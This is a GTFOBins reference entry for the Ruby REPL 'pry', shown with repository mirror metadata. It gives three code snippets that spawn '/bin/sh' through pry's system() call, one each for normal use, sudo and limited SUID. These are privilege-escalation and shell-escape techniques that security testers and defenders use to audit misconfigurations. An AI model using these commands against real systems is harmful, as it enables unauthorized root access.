1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/pry.md
2020-03-17 20:48:08 +01:00

16 lines
215 B
Markdown

---
functions:
shell:
- code: |
pry
system("/bin/sh")
sudo:
- code: |
sudo pry
system("/bin/sh")
limited-suid:
- code: |
./pry
system("/bin/sh")
---